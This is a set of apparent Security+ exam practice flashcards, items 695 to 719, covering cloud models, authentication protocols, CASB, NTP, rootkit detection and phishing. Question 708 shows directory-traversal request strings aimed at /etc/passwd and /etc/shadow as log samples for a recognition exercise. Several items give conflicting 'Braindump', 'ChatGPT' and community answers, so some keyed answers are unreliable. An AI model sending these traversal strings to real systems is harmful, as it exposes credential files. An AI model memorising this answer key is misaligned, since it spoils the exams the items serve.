A security architect at a large, multinational organization is concerned about the complexities and overhead of managing multiple encryption keys securely in a multicloud provider environment. The security architect is looking for a solution with reduced latency to allow the incorporation of the organization’s existing keys and to maintain consistent, centralized control and management regardless of the data location. Which of the following would best meet the architect’s objectives?

A. Trusted Platform Module
B. IaaS
C. HSMaaS
D. PaaS

A

C. HSMaaS (Hardware Security Module as a Service) would best meet the architect’s objectives.

Explanation:

Trusted Platform Module (TPM) (A): TPM is a hardware-based security device used for securing hardware through integrated cryptographic keys. While it provides strong security, it is not designed to manage multiple encryption keys across different cloud environments centrally.

IaaS (Infrastructure as a Service) (B): IaaS provides virtualized computing resources over the internet. While IaaS can be used to deploy HSMs, it does not inherently provide the key management capabilities required for this scenario.

HSMaaS (Hardware Security Module as a Service) (C): HSMaaS offers centralized, secure, and scalable key management. It allows organizations to incorporate their existing keys, manage multiple encryption keys across different cloud providers, and maintain consistent control. HSMaaS reduces latency and provides secure key management without the complexities of handling hardware directly.

PaaS (Platform as a Service) (D): PaaS provides a platform allowing customers to develop, run, and manage applications without the complexity of building and maintaining the underlying infrastructure. While PaaS can include security features, it does not specifically address centralized key management across multiple cloud providers.

Therefore, HSMaaS is the best choice to meet the architect’s objectives of securely managing multiple encryption keys across a multicloud environment with reduced latency and centralized control.

695
Q

Which of the following best represents an application that does not have an on-premises requirement and is accessible from anywhere?

A. PaaS
B. Hybrid cloud
C. Private cloud
D. IaaS
E. SaaS

A

E. SaaS (Software as a Service) best represents an application that does not have an on-premises requirement and is accessible from anywhere.

Explanation:

PaaS (Platform as a Service) (A): PaaS provides a platform for developers to build, deploy, and manage applications without managing the underlying infrastructure. While PaaS can be accessed from anywhere, it is more about providing a platform for development rather than a complete, ready-to-use application.

Hybrid cloud (B): A hybrid cloud combines on-premises infrastructure with cloud services. While it offers flexibility, it still involves on-premises components and does not solely focus on applications accessible from anywhere without on-premises requirements.

Private cloud (C): A private cloud is dedicated to a single organization and can be hosted on-premises or by a third-party provider. It generally involves more control and security but may have on-premises requirements.

IaaS (Infrastructure as a Service) (D): IaaS provides virtualized computing resources over the internet, such as virtual machines, storage, and networking. It is more focused on providing infrastructure rather than specific applications accessible from anywhere.

SaaS (Software as a Service) (E): SaaS delivers software applications over the internet, eliminating the need for on-premises installation or maintenance. Users can access SaaS applications from any location with an internet connection, making it the best option for an application that does not require on-premises infrastructure and is accessible from anywhere.

Therefore, SaaS is the best representation of an application without on-premises requirements that is accessible from anywhere.

696
Q

During an investigation, events from two affected servers in the same subnetwork occurred at the same time:
Server 1: 192.168.10.1 [01/Apr/2021:06:00:00 PST] SAN access denied for user ‘admin’
Server 2: 192.168.10.6 [01/Apr/2021:06:01:01 CST] SAN access successful for user ‘admin’
Which of the following should be consistently configured to prevent the issue seen in the logs?

A. Geolocation
B. TOTP
C. NTP
D. MFA

A

C. NTP (Network Time Protocol)

Explanation:

The issue seen in the logs is that the events from the two servers occurred at different times, even though they are supposed to have happened simultaneously. This discrepancy is likely due to the servers not being synchronized to the same time standard.

NTP (Network Time Protocol) (C): NTP is used to synchronize the clocks of computers to a reference time source. Ensuring all servers and network devices are synchronized to the same time source would prevent the discrepancies in log times, making it easier to correlate events and conduct investigations.

Geolocation (A): Geolocation determines the physical location of a device based on its IP address or other location-based services. This does not address the issue of time discrepancies.

TOTP (Time-based One-Time Password) (B): TOTP is an algorithm that generates a one-time password based on the current time. While it is useful for authentication, it does not address time synchronization between servers.

MFA (Multi-Factor Authentication) (D): MFA requires multiple forms of verification before granting access. While it enhances security, it does not address the issue of synchronizing server times.

Therefore, configuring NTP would be the appropriate solution to ensure that all servers have consistent time settings, preventing the issue seen in the logs.

697
Q

The most recent vulnerability scan flagged the domain controller with a critical vulnerability. The systems administrator researched the vulnerability and discovered the domain controller does not run the associated application with the vulnerability. Which of the following steps should the administrator take next?

A. Ensure the scan engine is configured correctly.
B. Apply a patch to the domain controller.
C. Research the CVE.
D. Document this as a false positive.

A

Community : D. Document this as a false positive (98%)

False Positive: This is a result that indicates a given condition has been fulfilled when it actually has not been fulfilled. In this case, the vulnerability scan flagged a critical vulnerability on the domain controller, but the administrator discovered that the domain controller does not run the associated application with the vulnerability. This indicates that the vulnerability alert is likely a false positive

Braindump & ChatGPT
A. Ensure the scan engine is configured correctly.

Before taking any further actions like applying patches or documenting it as a false positive, it's crucial to verify that the scan engine and its configuration are correct. Misconfigurations can lead to incorrect vulnerability reports. Ensuring the scan engine is accurate helps avoid future false positives and ensures that the vulnerability reports are reliable.

B. Apply a patch to the domain controller.
This step is unnecessary if the vulnerability doesn't apply to the domain controller. Patching should be based on the relevance of the vulnerability.

C. Research the CVE.
While researching the CVE can provide more information, the administrator already determined that the domain controller doesn't run the associated application. Ensuring the scan engine's configuration is accurate should be prioritized.

D. Document this as a false positive.
This step can be taken after confirming that the scan engine is correctly configured and verifying that the vulnerability report was indeed a false positive.

Therefore, the most prudent next step is to ensure the scan engine is configured correctly to prevent future inaccurate vulnerability flags.

698
Q

A company has decided to move its operations to the cloud. It wants to utilize technology that will prevent users from downloading company applications for personal use, restrict data that is uploaded, and have visibility into which applications are being used across the company. Which of the following solutions will best meet these requirements?

A. An NGFW
B. A CASB
C. Application whitelisting
D. An NG-SWG

A

B. A CASB

Explanation:

A CASB (Cloud Access Security Broker) is the best solution to meet the company’s requirements for the following reasons:

Preventing users from downloading company applications for personal use: A CASB can enforce policies that control how and when users access cloud applications, including restricting the download of applications to personal devices.

Restricting data that is uploaded: CASBs can monitor and control data being uploaded to cloud services, ensuring sensitive information is not improperly shared or stored.

Visibility into which applications are being used across the company: CASBs provide detailed visibility and analytics on cloud application usage, helping to monitor and manage the use of sanctioned and unsanctioned applications within the organization.

Other options do not comprehensively meet all these requirements:

A. An NGFW (Next-Generation Firewall): While an NGFW can provide some level of application control and security, it is not specifically designed for managing cloud application usage and data transfer the way a CASB is.

C. Application whitelisting: This approach controls which applications can run on a system but does not provide the broader cloud-specific visibility and data control features that a CASB offers.

D. An NG-SWG (Next-Generation Secure Web Gateway): An NG-SWG can provide web filtering and protection, but it does not offer the same level of cloud application management and data governance capabilities as a CASB.

Therefore, a CASB is the best solution to address the company’s specific needs related to cloud application usage, data control, and visibility.

(Brain dump: D. An NG-SWG)

699
Q

An internet company has created a new collaboration application. To expand the user base, the company wants to implement an option that allows users to log in to the application with the credentials of other popular websites. Which of the following should the company implement?

A. SSO
B. CHAP
C. 802.1x
D. OpenID

A

D. OpenID

Explanation:

OpenID is a protocol that enables users to authenticate using credentials from other popular websites (such as Google, Facebook, or others) to log in to a new application. This approach leverages existing authentication systems, making it easier for users to access the new collaboration application without creating new accounts.

A. SSO (Single Sign-On): SSO allows users to log in once and access multiple applications within the same organization, but it does not necessarily enable logging in with credentials from external websites.

B. CHAP (Challenge-Handshake Authentication Protocol): CHAP is an authentication protocol used mainly in PPP (Point-to-Point Protocol) connections to provide a way for the server to authenticate the client periodically during an ongoing session. It is not relevant to web-based application logins.

C. 802.1x: This is a network access control protocol used primarily for controlling access to wired and wireless networks. It is not related to web-based login systems.

OpenID is the best solution for enabling users to log in to the new collaboration application using credentials from other popular websites.

700
Q

Following a prolonged data center outage that affected web-based sales, a company has decided to move its operations to a private cloud solution. The security team has received the following requirements:
There must be visibility into how teams are using cloud-based services.
The company must be able to identify when data related to payment cards is being sent to the cloud.
Data must be available regardless of the end user’s geographic location.
Administrators need a single pane-of-glass view into traffic and trends.
Which of the following should the security analyst recommend?

A. Create firewall rules to restrict traffic to other cloud service providers.
B. Install a DLP solution to monitor data in transit.
C. Implement a CASB solution.
D. Configure a web-based content filter.

A

C. Implement a CASB solution.

Explanation:

CASB (Cloud Access Security Broker) solutions are designed to provide visibility into cloud service usage, enforce security policies, and ensure compliance with data protection requirements. Implementing a CASB solution would address the requirements mentioned:

Visibility into cloud-based service usage: CASB solutions offer detailed insights into how cloud services are being used across the organization.
Identifying payment card data: CASB can monitor data in transit and at rest for sensitive information, including payment card data, ensuring it is properly managed and protected.
Data availability regardless of location: CASB solutions facilitate secure access to cloud services from any location, maintaining data availability.
Single pane-of-glass view: CASB solutions provide a centralized dashboard that gives administrators a comprehensive view of cloud traffic, usage patterns, and security trends.

The other options do not comprehensively address all the stated requirements:

A. Create firewall rules to restrict traffic to other cloud service providers: This approach might help control traffic but does not provide the required visibility or data protection capabilities.
B. Install a DLP solution to monitor data in transit: While DLP can help protect sensitive data, it does not provide visibility into cloud service usage or a single pane-of-glass view.
D. Configure a web-based content filter: This may help control web access but does not offer the required insights into cloud service usage or comprehensive data protection.
701
Q

A recent malware outbreak across a subnet included successful rootkit installations on many PCs, ensuring persistence by rendering remediation efforts ineffective. Which of the following would best detect the presence of a rootkit in the future?

A. FDE
B. NIDS
C. EDR
D. DLP

A

C. EDR (Endpoint Detection and Response)

Explanation:

Endpoint Detection and Response (EDR) solutions are specifically designed to detect and respond to advanced threats, including rootkits. EDR tools continuously monitor endpoints for suspicious activity and provide detailed visibility into the behavior of applications and processes, making them highly effective at detecting rootkits. They can identify anomalies, provide alerting, and facilitate in-depth investigations, which are crucial for detecting and addressing rootkits that aim to achieve persistence.

The other options do not directly address the detection of rootkits:

A. FDE (Full Disk Encryption): FDE encrypts the data on the disk, but it does not detect or prevent rootkits.
B. NIDS (Network Intrusion Detection System): NIDS monitors network traffic for suspicious activity, but it may not be effective in detecting rootkits, which operate at the endpoint level.
D. DLP (Data Loss Prevention): DLP focuses on preventing data breaches by monitoring and controlling data transfers, but it is not designed to detect rootkits.

Therefore, EDR is the best choice for detecting the presence of rootkits in the future.

702
Q

An organization is building a single virtual environment that will host customer applications and data that require availability at all times. The data center that is hosting the environment will provide generator power and ISP services. Which of the following is the best solution to support the organization’s requirement?

A. NIC teaming
B. Cloud backups
C. A load balancer appliance
D. UPS

A

Community : D 62%, C 24%
Chat GPT :
D. UPS (Uninterruptible Power Supply)

Explanation:

In the scenario described, where the organization’s single virtual environment hosting customer applications and data requires constant availability, a UPS (Uninterruptible Power Supply) is the best solution to support this requirement. Here’s why:

Power Continuity: A UPS provides continuous power supply to critical infrastructure, such as servers and networking equipment, during electrical power disruptions or outages. This ensures that the virtual environment remains operational even if there are short-term power interruptions.

Protection Against Power Surges: UPS units also protect against power spikes and surges, which can damage sensitive electronic equipment.

Smooth Transition to Generator Power: In cases where the primary power source fails and backup generators kick in, a UPS acts as a bridge to ensure there is no interruption in power supply during the transition.

Stabilization of Power Quality: UPS systems also regulate and stabilize the voltage and frequency of the power supplied to the virtual environment, which can help prevent issues that may arise from inconsistent power quality.

While options like NIC teaming, cloud backups, and load balancer appliances are important in their respective contexts (network redundancy, data protection, and traffic distribution for high availability), they do not directly address the need for continuous power supply and protection against outages, which is crucial for maintaining availability in the described environment. Therefore, UPS is the most appropriate solution for ensuring continuous availability of the virtual environment in this scenario.

(Brain dump : C. A load balancer appliance)

703
Q

A new company wants to avoid channel interference when building a WLAN. The company needs to know the radio frequency behavior, identify dead zones, and determine the best place for access points. Which of the following should be done first?

A. Configure heat maps.
B. Utilize captive portals.
C. Conduct a site survey.
D. Install Wi-Fi analyzers.

A

C. Conduct a site survey.

Explanation:

When setting up a WLAN (Wireless Local Area Network), especially to avoid channel interference and ensure optimal coverage and performance, the first step should be to conduct a site survey. Here’s why:

Radio Frequency Behavior: A site survey involves analyzing the radio frequency (RF) behavior in the physical space where the WLAN will be deployed. This includes assessing existing RF interference, noise sources, and other signals that could affect WLAN performance.

Identify Dead Zones: By conducting a site survey, you can identify areas with poor or no coverage (dead zones) where additional access points may be required to ensure comprehensive coverage.

Optimal Access Point Placement: The survey helps in determining the best locations for installing access points (APs) to maximize coverage while minimizing interference between APs. It takes into account factors like building layout, construction materials, and potential sources of interference.

Heat Maps and Wi-Fi Analyzers: Heat maps and Wi-Fi analyzers are tools used during and after the site survey to visualize signal strength and interference levels. However, these tools are utilized effectively after the initial site survey has been conducted to validate the survey findings and fine-tune the WLAN deployment.

Therefore, conducting a site survey is the crucial first step to gather data on RF behavior, identify dead zones, and strategically place access points to optimize WLAN performance and minimize interference.

704
Q

The following IP information was provided to internal auditors to help assess organizational security:

User traffic subnet : 10.2.5.0/16
File Server : 10.2.2.7
Internal Linux Web server : 10.3.9.9
SQL Server : 10.3.15.82
HR server : 10.9.8.14
Firewall : 10.1.1.1

Which of the following tools would most likely be used to perform network reconnaissance and help understand what is accessible to all users? (Choose two.)

A. ipconfig
B. ping
C. chmod
D. netstat
E. traceroute
F. route

A

Community : (DE 47%, BE 45%)
D. netstat gives you what is listening
E. traceroute finds the path.
ping only does the host availability not the service.

(Chat GPT & Brain dump : B, E)
B. ping

Ping is used to determine whether a specific IP address is reachable and to measure the round-trip time for packets sent from the local host to a destination computer.

E. traceroute

Traceroute is used to display the route and measure transit delays of packets across an IP network. It shows the path packets take to reach a specified destination.

Here’s how these tools apply to the scenario provided:

Ping: It can be used to determine if the servers (File Server, Internal Linux Web Server, SQL Server, HR Server) are reachable from the user traffic subnet (10.2.5.0/16). For example, by pinging 10.2.2.7 (File Server) from a machine in the user traffic subnet, one can verify if it responds, indicating accessibility.

Traceroute: This tool can be used to trace the path packets take from the user traffic subnet to each of the servers (File Server, Internal Linux Web Server, SQL Server, HR Server). It helps in understanding the network hops and potential access points between the user subnet and these servers.

Tools that are less relevant or not typically used for this purpose in this context:

A. ipconfig: This command displays the IP configuration for Windows machines, focusing on local network settings rather than external network reconnaissance.
C. chmod: This command is used to change file permissions in Unix-like operating systems, not for network reconnaissance.
D. netstat: Netstat displays network connections, routing tables, interface statistics, masquerade connections, and multicast memberships. While useful for network troubleshooting, it doesn’t provide the path or accessibility understanding like ping and traceroute.
F. route: This command shows/manipulates the IP routing table. It helps manage routing tables, not for network reconnaissance in terms of path and accessibility checking like ping and traceroute.

Therefore, ping and traceroute are the most appropriate tools for performing network reconnaissance and understanding what resources are accessible from the user traffic subnet based on the IP information provided.

705
Q

A software company adopted the following processes before releasing software to production:
Peer review
Static code scanning
Signing
A considerable number of vulnerabilities are still being detected when code is executed on production. Which of the following security tools can improve vulnerability detection on this environment?

A. File integrity monitoring for the source code
B. Dynamic code analysis tool
C. Encrypted code repository
D. Endpoint detection and response solution

A

B. Dynamic code analysis tool

Here’s why a dynamic code analysis tool is the most appropriate choice:

Complement to Static Analysis: While static code scanning (static analysis) helps identify vulnerabilities by analyzing the code without executing it, dynamic code analysis (dynamic analysis) examines the code during runtime. It can detect vulnerabilities that may only manifest during execution or interaction with other components.

Detection of Runtime Vulnerabilities: Dynamic analysis tools can detect issues such as memory leaks, input validation flaws, insecure configurations, and other runtime-specific vulnerabilities. These might not be evident during static analysis but can affect the application when it is running in a production environment.

Continuous Monitoring: Unlike static analysis, which is typically performed during development or before deployment, dynamic analysis can provide continuous monitoring of the application in its operational state. This helps in detecting vulnerabilities that might emerge over time or due to changes in the environment.

Feedback Loop for Developers: Dynamic analysis tools often provide real-time feedback to developers about vulnerabilities discovered during runtime. This allows for quicker identification and remediation of issues, improving overall application security.

Therefore, implementing a dynamic code analysis tool would enhance the company’s ability to detect vulnerabilities in the production environment, complementing the existing static code scanning and peer review processes.

706
Q

A security analyst needs to harden access to a network. One of the requirements is to authenticate users with smart cards. Which of the following should the analyst enable to best meet this requirement?

A. CHAP
B. PEAP
C. MS-CHAPv2
D. EAP-TLS

A

D. EAP-TLS (Extensible Authentication Protocol - Transport Layer Security)

Here’s why EAP-TLS is suitable for smart card authentication:

Mutual Authentication: EAP-TLS supports mutual authentication, which means both the client (user with a smart card) and the server (network or authentication server) authenticate each other using digital certificates. This aligns well with the security requirements for smart card-based authentication.

Certificate-based Authentication: Smart cards typically store digital certificates that authenticate the user to the network. EAP-TLS facilitates the use of these certificates for secure authentication without transmitting sensitive information like passwords over the network.

Strong Security: EAP-TLS utilizes TLS (Transport Layer Security), which provides strong encryption and integrity protection during the authentication process. This ensures that the authentication exchange between the client and server is secure against eavesdropping and tampering.

In contrast, the other options:

CHAP (Challenge Handshake Authentication Protocol) and MS-CHAPv2 (Microsoft Challenge Handshake Authentication Protocol version 2) are primarily used for password-based authentication and do not directly support smart card authentication.

PEAP (Protected Extensible Authentication Protocol) is an authentication protocol that supports various inner authentication methods, including EAP-TLS. However, PEAP itself does not provide the direct support needed for smart card-based authentication; rather, it encapsulates other EAP methods like EAP-TLS within a secure tunnel.

Therefore, EAP-TLS is the most appropriate choice to enable smart card authentication while ensuring strong security and compliance with smart card deployment requirements.

707
Q

A penetration-testing firm is working with a local community bank to create a proposal that best fits the needs of the bank. The bank’s information security manager would like the penetration test to resemble a real attack scenario, but it cannot afford the hours required by the penetration-testing firm. Which of the following would best address the bank’s desired scenario and budget?

A. Engage the penetration-testing firm’s red-team services to fully mimic possible attackers.
B. Give the penetration tester data diagrams of core banking applications in a known-environment test.
C. Limit the scope of the penetration test to only the system that is used for teller workstations.
D. Provide limited networking details in a partially known-environment test to reduce reconnaissance efforts.

A

D. Provide limited networking details in a partially known-environment test to reduce reconnaissance efforts.
Explanation:

A. Engage the penetration-testing firm's red-team services to fully mimic possible attackers:
    While this option would provide a very realistic attack scenario, red-team services are typically very comprehensive and can be quite costly due to the extensive time and effort required to fully mimic attackers. This might not fit within the bank's budget constraints.

B. Give the penetration tester data diagrams of core banking applications in a known-environment test:
    This would save time on reconnaissance but may not fully resemble a real attack scenario because the tester would have more information than a typical attacker would.

C. Limit the scope of the penetration test to only the system that is used for teller workstations:
    Limiting the scope too much might not provide a comprehensive assessment of the bank's overall security posture, and could miss critical vulnerabilities in other parts of the network.

D. Provide limited networking details in a partially known-environment test to reduce reconnaissance efforts:
    This option strikes a balance between providing a realistic attack scenario and controlling costs. By giving limited details, the penetration testers can focus on testing without spending excessive time on reconnaissance, thereby simulating a more realistic attack within a constrained budget.

Conclusion:

Option D allows the bank to simulate a realistic attack scenario while controlling costs by reducing the time spent on the reconnaissance phase. This approach aligns well with the bank’s need to balance realism with budget constraints.

708
Q

A security analyst is reviewing SIEM logs during an ongoing attack and notices the following:

http://company.com/get.php?f=/etc/passwd
https://company.com/..%2F..%2F..%2F..%2Fetc%2Fshadow
https://company.com/../../../../etc/passwd

Which of the following best describes the type of attack?

A. SQLi
B. CSRF
C. API attacks
D. Directory traversal

A

D. Directory traversal

Explanation:

Directory traversal attacks involve an attacker manipulating a URL to access files and directories that are stored outside the web root folder. The aim is to access restricted files, such as configuration files, password files, or other sensitive information on the server.

The log entries show attempts to access the /etc/passwd and /etc/shadow files by including sequences like ../../../../, which is a typical pattern in directory traversal attacks. This pattern attempts to navigate up the directory structure to reach the root directory and then access the specified files.

The other options are not applicable based on the provided log entries:

A. SQLi (SQL injection): This involves inserting or manipulating SQL queries in input fields to execute arbitrary SQL commands. There are no SQL commands or database interactions in the provided logs.
B. CSRF (Cross-Site Request Forgery): This exploits the trust that a web application has in a user's browser, typically involving actions made on behalf of an authenticated user. The logs do not indicate any actions being performed on behalf of a user.
C. API attacks: These involve exploiting vulnerabilities in an application's API. The logs do not show interactions with an API or attempts to exploit API endpoints.

Thus, the attack observed in the logs is best categorized as a directory traversal attack.

709
Q

A certificate vendor notified a company that recently invalidated certificates may need to be updated. Which of the following mechanisms should a security administrator use to determine whether the certificates installed on the company’s machines need to be updated?

A. SCEP
B. OCSP
C. CSR
D. CRL

A

D. CRL (Certificate Revocation List)

Explanation:

CRL (Certificate Revocation List): A CRL is a list of certificates that have been revoked by the certificate authority (CA) before their expiration date and should no longer be trusted. By checking the CRL, the security administrator can determine if any of the installed certificates have been revoked and therefore need to be updated.

The other options are not directly related to checking the status of installed certificates:

A. SCEP (Simple Certificate Enrollment Protocol): This is used for certificate enrollment and issuing certificates, not for checking their revocation status.
B. OCSP (Online Certificate Status Protocol): OCSP is a protocol used to obtain the revocation status of a single certificate in real-time. While OCSP can be used to check the revocation status, it is more commonly used for checking individual certificates on the fly rather than reviewing all installed certificates. However, OCSP could be a complementary method if real-time checks are needed.
C. CSR (Certificate Signing Request): A CSR is a request sent to a CA to apply for a digital identity certificate. It does not pertain to checking the status of existing certificates.

Therefore, the CRL is the most appropriate mechanism for determining whether the certificates need to be updated.

710
Q

A recent vulnerability scan revealed multiple servers have non-standard ports open for applications that are no longer in use. The security team is working to ensure all devices are patched and hardened. Which of the following would the security team perform to ensure the task is completed with minimal impact to production?

A. Enable HIDS on all servers and endpoints.
B. Disable unnecessary services.
C. Configure the deny list appropriately on the NGFW.
D. Ensure the antivirus is up to date.

A

B. Disable unnecessary services.

Explanation:

Disabling unnecessary services will directly address the issue of non-standard ports being open for applications that are no longer in use. This action will help close security gaps and reduce the attack surface without significantly impacting production, as it targets only the services and applications that are confirmed to be no longer needed.

Here’s why the other options are less suitable in this specific scenario:

A. Enable HIDS on all servers and endpoints: While Host-based Intrusion Detection Systems (HIDS) are important for monitoring and detecting suspicious activities, enabling them does not directly address the issue of unnecessary services and open ports.

C. Configure the deny list appropriately on the NGFW: Configuring a deny list on the Next-Generation Firewall (NGFW) can help block traffic to and from the non-standard ports. However, this does not remove the underlying issue of unnecessary services running on the servers. It is better to disable those services entirely to reduce the risk.

D. Ensure the antivirus is up to date: Keeping antivirus software up to date is important for overall security, but it does not address the specific issue of open ports and unnecessary services directly.
711
Q

An employee fell for a phishing scam, which allowed an attacker to gain access to a company PC. The attacker scraped the PC’s memory to find other credentials. Without cracking these credentials, the attacker used them to move laterally through the corporate network. Which of the following describes this type of attack?

A. Privilege escalation
B. Buffer overflow
C. SQL injection
D. Pass-the-hash

A

D. Pass-the-hash

Explanation:

In a pass-the-hash attack, an attacker extracts hashed credentials from one computer and uses them to authenticate on other computers within the network without cracking the hash. This method allows the attacker to move laterally through the network by using the hashed credentials to gain access to other systems.

Here’s why the other options are less suitable:

A. Privilege escalation: This involves gaining higher-level permissions than those initially granted, which is not the primary focus of the attack described.
B. Buffer overflow: This involves exploiting a program's vulnerability to execute arbitrary code, which does not match the scenario described.
C. SQL injection: This involves manipulating SQL queries to gain unauthorized access to a database, which is not related to the attack on credentials in this scenario.
712
Q

Which of the following is a common source of unintentional corporate credential leakage in cloud environments?

A. Code repositories
B. Dark web
C. Threat feeds
D. State actors
E. Vulnerability databases

A

A. Code repositories

Explanation:

Code repositories, such as those hosted on platforms like GitHub, GitLab, or Bitbucket, are a common source of unintentional corporate credential leakage. Developers sometimes accidentally commit credentials, API keys, or other sensitive information to these repositories. If these repositories are public or improperly secured, unauthorized individuals can access and exploit this information. This makes code repositories a significant risk factor for credential leakage in cloud environments.

Here’s why the other options are less suitable:

B. Dark web: The dark web is a place where leaked credentials may be traded, but it is not a source of unintentional leakage.
C. Threat feeds: These provide information about potential threats but are not a source of credential leakage.
D. State actors: These are entities that might exploit leaked credentials, not a source of unintentional leakage.
E. Vulnerability databases: These catalog vulnerabilities but do not typically contain leaked credentials directly.
713
Q

A company is designing the layout of a new data center so it will have an optimal environmental temperature.
Which of the following must be included? (Choose two.)

A. An air gap
B. A cold aisle
C. Removable doors
D. A hot aisle
E. An IoT thermostat
F. A humidity monitor

A

B. A cold aisle
D. A hot aisle

Explanation:

To achieve optimal environmental temperature in a data center, it is crucial to design the layout with proper airflow management. The “cold aisle/hot aisle” configuration is a standard best practice in data center design for maintaining appropriate cooling and temperature control. Here’s a detailed look at why these options are the most relevant:

B. A cold aisle: This is where the cold air is supplied to cool the front of the equipment racks. The cold air is typically directed from the raised floor or directly from cooling units.

D. A hot aisle: This is where the hot air expelled from the back of the equipment racks is collected. The hot aisle is usually aligned with the return air pathways to the cooling units.

By arranging equipment in cold aisle/hot aisle configurations, a data center can ensure that cold air is efficiently used to cool equipment and that hot air is effectively removed from the environment, maintaining an optimal temperature.

Here’s why the other options are less relevant in this context:

A. An air gap: While useful in certain cooling strategies, it is not a standard or primary method for data center cooling.

C. Removable doors: These are not typically related to temperature control but more to physical access and maintenance.

E. An IoT thermostat: While helpful for monitoring, it is not a design element of the data center layout.

F. A humidity monitor: Important for overall environmental control, but not specifically related to the design layout for temperature management.

Thus, for maintaining optimal environmental temperature, incorporating a cold aisle and a hot aisle is essential.

714
Q

A privileged user at a company stole several proprietary documents from a server. The user also went into the log files and deleted all records of the incident. The systems administrator has just informed investigators that other log files are available for review. Which of the following did the administrator most likely configure that will assist the investigators?

A. Memory dumps
B. The syslog server
C. The application logs
D. The log retention policy

A

B. The syslog server

Explanation:

A syslog server is typically used to collect and store log data from multiple devices and systems in a centralized location. By configuring a syslog server, the systems administrator ensures that log data is copied and stored separately from the local system logs. This makes it much harder for a privileged user to cover their tracks completely by deleting local log files, as the logs would still be available on the syslog server.

Here’s a more detailed look at why this is the most likely helpful configuration:

A. Memory dumps: These are snapshots of the system’s memory at a point in time and are not typically used for storing ongoing log files. They are more useful for diagnosing crashes or debugging applications.

C. The application logs: While these could be useful, they are often stored on the same server where the application is running. If the user deleted local logs, the application logs on the same server might also be deleted.

D. The log retention policy: This ensures logs are kept for a certain period, but it does not prevent logs from being deleted locally if not combined with central logging.

By having a syslog server configured, log entries are sent to a centralized and often secure location where they can be reviewed even if the local logs have been tampered with or deleted. This setup is essential for incident response and forensic investigations.

715
Q

Local guidelines require that all information systems meet a minimum security baseline to be compliant. Which of the following can security administrators use to assess their system configurations against the baseline?

A. SOAR playbook
B. Security control matrix
C. Risk management framework
D. Benchmarks

A

D. Benchmarks

Explanation:

Benchmarks, such as those provided by the Center for Internet Security (CIS) or other similar organizations, offer detailed guidance and best practices for securing various information systems and ensuring they meet a minimum security baseline. These benchmarks can be used to assess system configurations against a set of standardized security controls and best practices.

Here’s a more detailed look at why benchmarks are the most appropriate choice:

A. SOAR playbook: A Security Orchestration, Automation, and Response (SOAR) playbook is used to automate and orchestrate incident response activities, not specifically for assessing system configurations against a security baseline.

B. Security control matrix: While a security control matrix can help map controls to various requirements, it is not specifically used to assess system configurations. It’s more of a tool for tracking and ensuring all necessary controls are implemented.

C. Risk management framework: This provides a structured approach to managing risk and includes processes for identifying, assessing, and mitigating risks. However, it is broader and more strategic, not specifically focused on assessing system configurations against a baseline.

Benchmarks provide practical and specific criteria for evaluating whether systems comply with security standards and baselines. They typically include detailed configuration settings and recommendations for securing various types of systems and applications, making them the best tool for this purpose.

716
Q

A company’s public-facing website, https://www.organization.com, has an IP address of 166.18.75.6. However, over the past hour the SOC has received reports of the site’s homepage displaying incorrect information. A quick nslookup search shows https://www.organization.com is pointing to 151.191.122.115. Which of the following is occurring?

A. DoS attack
B. ARP poisoning
C. DNS spoofing
D. NXDOMAIN attack

A

C. DNS spoofing

Explanation:

DNS spoofing (also known as DNS cache poisoning) is an attack where the attacker corrupts the DNS resolver cache by inserting false DNS information. This results in redirecting traffic from the legitimate IP address to a malicious IP address. In this case, the company’s website should resolve to 166.18.75.6, but it is resolving to 151.191.122.115, indicating that a DNS spoofing attack is likely occurring.

Here’s why the other options are less appropriate:

A. DoS attack: A Denial of Service (DoS) attack aims to make a service unavailable by overwhelming it with traffic. This does not typically involve changing DNS records or redirecting traffic.

B. ARP poisoning: Address Resolution Protocol (ARP) poisoning involves sending falsified ARP messages over a local network to associate the attacker's MAC address with the IP address of a legitimate device. This attack is localized to a specific network and would not explain the incorrect IP address being resolved over the internet.

D. NXDOMAIN attack: This attack targets the non-existence of domains, causing legitimate queries to fail by returning an NXDOMAIN (non-existent domain) response. This does not explain why the domain resolves to an incorrect IP address.

The incorrect IP address pointing to the company’s domain strongly suggests that DNS spoofing is occurring.

717
Q

An employee receives an email stating the employee won the lottery. The email includes a link that requests a name, mobile phone number, address, and date of birth be provided to confirm employee’s identity before sending the prize. Which of the following best describes this type of email?

A. Spear phishing
B. Whaling
C. Phishing
D. Vishing

A

C. Phishing

Explanation:

Phishing is a type of cyberattack where attackers send fraudulent emails or messages that appear to be from legitimate sources, attempting to trick recipients into providing personal information such as names, phone numbers, addresses, and dates of birth.

Here’s why the other options are less appropriate:

A. Spear phishing: This is a targeted form of phishing aimed at a specific individual or organization, often using personalized information. The given scenario does not indicate that the email is targeted specifically at the employee using personal details, but rather a generic "you won the lottery" scam.

B. Whaling: This is a type of phishing attack that specifically targets high-profile individuals such as executives or senior management. The scenario does not indicate that the email targets a high-profile individual.

D. Vishing: This stands for "voice phishing" and involves fraudulent phone calls to obtain personal information. The scenario involves an email, not a phone call.

Thus, the scenario described is best categorized as phishing.

718
Q

A company currently uses passwords for logging in to company-owned devices and wants to add a second authentication factor. Per corporate policy, users are not allowed to have smartphones at their desks. Which of the following would meet these requirements?

A. Smart card
B. PIN code
C. Knowledge-based question
D. Secret key

A

A. Smart card

Explanation:

In the scenario where users are not allowed to have smartphones at their desks but need a second authentication factor, a smart card is a suitable solution. Smart cards are physical devices that typically contain embedded chips capable of storing cryptographic keys and certificates. Here’s why it fits the requirement:

Smart card: A smart card can be inserted into a card reader attached to the device or computer. It provides the second factor of authentication by requiring something the user has (the physical card) in addition to the password (something the user knows).

PIN code: While a PIN code can be used with a smart card for authentication, it alone doesn't satisfy the requirement for a second factor because it falls under "something the user knows," similar to a password.

Knowledge-based question: This is also something the user knows, typically used as a password recovery or reset method rather than a second factor for regular authentication.

Secret key: This is typically used in cryptographic contexts but doesn't provide a second factor of authentication on its own without additional components like a smart card or token.

Therefore, a smart card is the most appropriate choice for adding a second authentication factor while adhering to the policy that prohibits smartphones at desks.

719
Q

The Chief Technology Officer of a local college would like visitors to utilize the school’s Wi-Fi but must be able to associate potential malicious activity to a specific person. Which of the following would best allow this objective to be met?

A. Requiring all new. on-site visitors to configure their devices to use WPS
B. Implementing a new SSID for every event hosted by the college that has visitors
C. Creating a unique PSK for every visitor when they arrive at the reception area
D. Deploying a captive portal to capture visitors’ MAC addresses and names

A

D. Deploying a captive portal to capture visitors’ MAC addresses and names

Explanation:

